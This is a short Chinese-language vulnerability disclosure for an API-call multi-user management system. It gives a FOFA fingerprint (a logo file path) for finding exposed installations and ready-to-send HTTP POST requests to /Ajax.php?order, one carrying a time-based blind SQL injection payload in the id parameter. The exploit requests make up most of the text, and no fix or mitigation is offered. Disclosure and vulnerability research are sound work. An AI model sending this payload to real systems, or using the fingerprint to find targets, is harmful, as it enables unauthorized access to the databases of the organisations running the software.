API接口调用多用户管理系统Ajax存在前台SQL注入漏洞
一、漏洞简介
API接口调用多用户管理系统提供了智能化的API接口调用管理功能,用户可以通过系统轻松管理各种接口的调用情况,包括调用频率、成功率、响应时间等指标。API接口调用多用户管理系统Ajax存在前台SQL注入漏洞
二、影响版本
- API接口调用多用户管理系统
三、资产测绘
- fofa
"./assets/layuiadmin/style/res/logo.png"- 特征
四、漏洞复现
POST /Ajax.php?order HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
id=11' AND (SELECT 1465 FROM (SELECT(SLEEP(5)))sMaC)-- Gxag
POST /Ajax.php?order HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
id=11